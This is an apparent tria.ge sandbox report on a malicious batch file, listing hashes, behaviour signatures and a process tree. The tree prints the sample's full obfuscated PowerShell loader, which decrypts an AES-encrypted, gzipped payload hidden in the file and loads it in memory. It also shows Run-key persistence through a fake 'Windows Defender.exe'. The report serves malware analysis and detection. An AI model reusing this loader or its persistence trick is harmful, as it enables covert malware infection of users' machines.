Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
137s -
max time network
106s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
15/05/2024, 22:53
Static task
static1
Behavioral task
behavioral1
Sample
s.bat
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
s.bat
Resource
win10v2004-20240426-en
General
-
Target
s.bat
-
Size
864KB
-
MD5
42c72c26bb7fc92064808e8edb9efdbc
-
SHA1
8b9cb6f781b99cc723aa2a0d9bcffecd73a5490a
-
SHA256
722c42c544ec40709b016906077aa4ee555c414a998e3986d9b44e4cfb28b4c2
-
SHA512
7ac1c09e3242eb3d43d9a1c86e1abd5c1cdc75b5a32881a7287defb0407010533c891eaa0b0d12a496d885ebfc3bc41b57934dfe55a979f0a08a2745d61c167e
-
SSDEEP
24576:ifUMJg2oIqiT97xw/+JOg0MJcz/aaCbZr:SU/s1T9N0/aawr
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2528 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 1 IoCs
pid Process 3372 Windows Defender.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Defender = "\"C:\\Windows\\SysWOW64\\Windows Defender\\Windows Defender.exe\"" powershell.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Defender = "\"C:\\Windows\\SysWOW64\\Windows Defender\\Windows Defender.exe\"" powershell.exe -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\Windows Defender powershell.exe File created C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe powershell.exe File opened for modification C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3571316656-3665257725-2415531812-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2528 powershell.exe 2528 powershell.exe 3372 Windows Defender.exe 3372 Windows Defender.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 3372 Windows Defender.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 4140 wrote to memory of 2528 4140 cmd.exe 86 PID 4140 wrote to memory of 2528 4140 cmd.exe 86 PID 4140 wrote to memory of 2528 4140 cmd.exe 86 PID 2528 wrote to memory of 2244 2528 powershell.exe 92 PID 2528 wrote to memory of 2244 2528 powershell.exe 92 PID 2528 wrote to memory of 2244 2528 powershell.exe 92 PID 2244 wrote to memory of 1468 2244 WScript.exe 93 PID 2244 wrote to memory of 1468 2244 WScript.exe 93 PID 2244 wrote to memory of 1468 2244 WScript.exe 93 PID 1468 wrote to memory of 3372 1468 cmd.exe 95 PID 1468 wrote to memory of 3372 1468 cmd.exe 95 PID 1468 wrote to memory of 3372 1468 cmd.exe 95
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\s.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:4140 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XLntWa+7DUuCS+fnbQfhf/cxydXpLtg+PQ02HHuVeRk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NtpnTWtFGpfhlwj+FpJ6UQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $xlRxg=New-Object System.IO.MemoryStream(,$param_var); $zRntR=New-Object System.IO.MemoryStream; $biJHY=New-Object System.IO.Compression.GZipStream($xlRxg, [IO.Compression.CompressionMode]::Decompress); $biJHY.CopyTo($zRntR); $biJHY.Dispose(); $xlRxg.Dispose(); $zRntR.Dispose(); $zRntR.ToArray();}function execute_function($param_var,$param2_var){ $SZVOd=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $zTOPO=$SZVOd.EntryPoint; $zTOPO.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\s.bat';$zVVoV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\s.bat').Split([Environment]::NewLine);foreach ($RfCQM in $zVVoV) { if ($RfCQM.StartsWith(':: ')) { $fcaeB=$RfCQM.Substring(3); break; }}$payloads_var=[string[]]$fcaeB.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Drops file in System32 directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1468 -
C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe"C:\Windows\SysWOW64\Windows Defender\Windows Defender.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3372
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
436B
MD53d8b134867dfacfb69c41d942c4eb0f8
SHA16e03c2181e8054a6456463f1c9a5578109f400d8
SHA2560d0c60bff9e22ab9e93bfd851df80234948aeb17c504175ad326df3ec9b71144
SHA512f299c44e4cc6d51b9183f8d9ec390b7697aa655ff7be240c69bbabf876137b588e22834aac8f756ef25041b8e4b53efdf4d52668c7d78a509bc4655f3c591f8d
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc